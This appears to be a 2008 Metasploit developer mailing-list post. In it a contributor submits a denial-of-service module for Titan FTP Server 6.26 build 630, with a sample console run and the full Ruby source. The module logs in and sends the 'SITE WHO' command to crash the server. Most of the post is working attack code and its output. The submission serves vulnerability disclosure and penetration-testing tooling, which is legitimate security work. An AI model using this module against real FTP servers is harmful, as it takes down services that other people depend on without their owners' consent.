-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hey guys,
I've attached a DoS auxiliary module for the Titan FTP server v6.26 build 630,
based on the Python script from earlier today.
msf > use dos/ftp/titan626_site
msf auxiliary(titan626_site) > set RHOST 192.168.10.2
RHOST => 192.168.10.2
msf auxiliary(titan626_site) > set FTPUSER test
FTPUSER => test
msf auxiliary(titan626_site) > set FTPPASS test
FTPPASS => test
msf auxiliary(titan626_site) > run
[*] Connecting to FTP server 192.168.10.2:21...
[*] Connected to target FTP server.
[*] Authenticating as test with password test...
[*] Sending password...
[*] Sending command...
[*] Auxiliary module execution completed
msf auxiliary(titan626_site) > info
Name: Titan FTP Server 6.26.630 SITE WHO DoS
Version: 1
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS test yes Valid FTP password for username
FTPUSER test yes Valid FTP username
RHOST 192.168.10.2 yes The target address
RPORT 21 yes The target port
Description:
The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE
WHO". You need a valid login so you can send this command.
Thanks,
Kris Katterjohn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQIVAwUBSPU7kv9K37xXYl36AQL/DA//YHo5MLoeVi2YWZ5OtEiCZeT1oFJoUkvW
FEAtf3kXMU8sg3ndelJTDR670TkDy/hfYE5ZqNyEjb6sLslAOCso1og3g7z5dCsQ
x5ApNjTjmNiiQyY4uErpa/a1sORUGiIXrfn4Cyf3fZT4aA+G8ATUo6Y1ypi3IrAY
QkEK+9aQuAmhzbVhsFPnmIduHuCAHakpEjx4az9U+3j2+LUkBV94kn6tnLlMazjQ
2zVBrar9WrPQlpNzkaH7KMUpMft057+2H/UxWROjzXDGISfCkhqXwweyKeOk7lTT
gW+fDLxu2rbyR2X2G0nnEOSaWomeCrm2OZoQx+R/lciiB68vsFBBcf9kIQbs1r89
75nW9uxbtEGPSHYEXeabqL8KgCC+ckxUOzJL6sbnf3BasGvyPYdNi/yARGImIhUL
pbEyUO3YQRtwI3KcohpGHXNdf+9p72iOKRqH3vdLKNjlde0mLMh6QsJs1fieIaPE
hYgE9qs221I18TTmZljmLh6RyFoaM98eTHMCAUGJZlogr9d2ypv5/HQZnVN+2vlp
vCbpz7gfd61Db+cBTPWhBvGT28JArGr2ktsoJZiPmj6+ehWkZR2UjnGwSghwu6A6
xCpP0xjTxFKqLgqCUWu0Fer2s2P3yq+FV5OXHzawYFSCf7rJLM8qIcPJP1NksAXf
ReymTAm6UCc=
=0ama
-----END PGP SIGNATURE-----
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Titan FTP Server 6.26.630 SITE WHO
DoS',
'Description' => %q{
The Titan FTP server v6.26 build 630 can be
DoS'd by
issuing "SITE WHO". You need a valid login so
you
can send this command.
},
'Author' => 'Kris Katterjohn <[EMAIL
PROTECTED]>',
'License' => MSF_LICENSE,
'Version' => '1',
'References' =>
[ [ 'URL', 'http://milw0rm.com/exploits/6753']
],
'DisclosureDate' => 'Oct 14 2008'))
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username',
'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password
for username', 'anonymous' ])
])
end
def run
connect_login
print_status("Sending command...")
raw_send("SITE WHO\r\n")
sleep 1
disconnect
end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
